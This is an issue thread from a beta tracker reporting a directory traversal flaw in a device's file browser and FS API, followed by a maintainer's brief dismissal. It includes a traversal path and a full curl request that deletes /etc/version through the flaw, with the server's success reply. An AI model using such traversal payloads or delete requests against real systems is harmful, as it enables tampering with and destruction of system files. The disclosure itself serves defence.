### ISSUE TITLE
minor security issue directory traversal in file browser and FS API

### ISSUE THREAD

**Issue by shivalwolf** [Othernet-Project/Skylark_beta_tracker#3]
Minor security issue. (login required or active session)

The file manager allows manually entering paths with directory traversal.
home:///../../mnt/conf/etc

The FS api allows for directory traversal as well.

Arbitrary files can be uploaded. I was not able to read or download files.
However its possible to overwrite a file that exists it must be deleted 1st which can be done by making a direct call to the delete or rename commands
(testing with the /etc/version file as its restored on reboot)

curl 'http://10.10.10.182/FS/delete' -H 'Origin: http://10.10, deflate' -H 'Accept-Language: en,en-AU;q=0.8' -H 'Content-Type: application/json' -H 'Referer: http://10.10.10.182/' -H 'Cookie: session=43f25da32e32bf4e387681cc2c6a8813' -H 'Connection: keep-alive' -H 'DNT: 1' --data-binary '{"path":"home:///../../etc/version"}' --compressed
{"result":true,"error":false}

once this is done the upload method can be used.
only changes to persistent locations are kept like the /mnt/conf directory

**Comment by abgoyal** [comment]
the logged-in user can do anything they wish, anyway.
